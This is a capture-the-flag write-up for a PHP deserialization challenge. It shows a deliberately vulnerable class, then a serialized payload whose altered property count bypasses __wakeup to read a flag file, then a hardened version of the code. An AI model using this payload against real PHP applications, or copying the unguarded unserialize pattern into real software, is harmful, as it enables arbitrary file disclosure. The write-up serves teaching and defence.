This article was last updated 448 days ago; the information in it may be out of date. If you find an error, please send an email to big_fw@foxmail.com.

1. Visit the site

2. Analyze the code

```php
<?php
class X
{
    public $x = __FILE__;

    function __construct($x)
    {
        $this->x = $x;
    }

    function __wakeup()
    {
        // Reset x to this file's path whenever the object is unserialized
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }

    function __destruct()
    {
        highlight_file($this->x);
        // flag is in fllllllag.php
    }
}

if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}
```
Entry (head): x
__wakeup bypass: $this->x=fllllllag.php
Sink (tail): x->__destruct->highlight_file with $this->x=fllllllag.php

Approach:
1. Entry (head): x
2. Sink (tail): x->__destruct->highlight_file
3. __wakeup overwrites the property x, so it must be bypassed
4. __construct is not triggered during unserialization, so it can be ignored
5. Set x to fllllllag.php
3. Generate the payload

```
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
```

URL-encoded:

```
O%3A1%3A%22X%22%3A1%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D
```

To bypass the __wakeup magic method, change the declared number of class properties to 2:

```
O%3A1%3A%22X%22%3A2%3A%7Bs%3A1%3A%22x%22%3Bs%3A13%3A%22fllllllag.php%22%3B%7D
```
4. Execute the payload

Summary
- PHP deserialization
- __wakeup bypass: change the declared number of class properties
- __construct is not triggered during deserialization
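For contrast, here is a hardened counterpart of class X, written as an added example rather than the challenge's own code. The property-count trick works because of CVE-2016-7124 (PHP before 5.6.25 / 7.0.10 skipped __wakeup() when the declared count was wrong); the example assumes PHP 7.0 or later for the allowed_classes option and closes the hole on any version by validating at the sink and by refusing to instantiate classes from user input at all.

```php
<?php
// Added example, not the challenge's code: a hardened counterpart of class X.
// The property-count trick relies on CVE-2016-7124 (PHP < 5.6.25 / < 7.0.10),
// where a wrong property count skipped __wakeup(). Two changes close the hole
// on any version:
//   1. __destruct() validates the path itself instead of trusting __wakeup().
//   2. unserialize() is called with allowed_classes => false (PHP >= 7.0), so
//      user input can never instantiate X; it yields __PHP_Incomplete_Class,
//      whose magic methods never run.
class X
{
    public $x = __FILE__;

    function __construct($x)
    {
        $this->x = $x;
    }

    function __wakeup()
    {
        $this->x = __FILE__;   // kept, but no longer the only guard
    }

    function __destruct()
    {
        // Check at the sink: a skipped __wakeup() no longer matters.
        if ($this->x === __FILE__) {
            highlight_file($this->x);
        }
    }
}

// Payload from the writeup, with the correct property count (1).
$payload = 'O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}';

// Change 2: no X object is restored, so no file is read.
$obj = unserialize($payload, ['allowed_classes' => false]);
var_dump(get_class($obj));   // string(22) "__PHP_Incomplete_Class"

// If X really must be restored from serialized input, allow it explicitly
// and rely on the check inside __destruct():
// $obj = unserialize($payload, ['allowed_classes' => ['X']]);
```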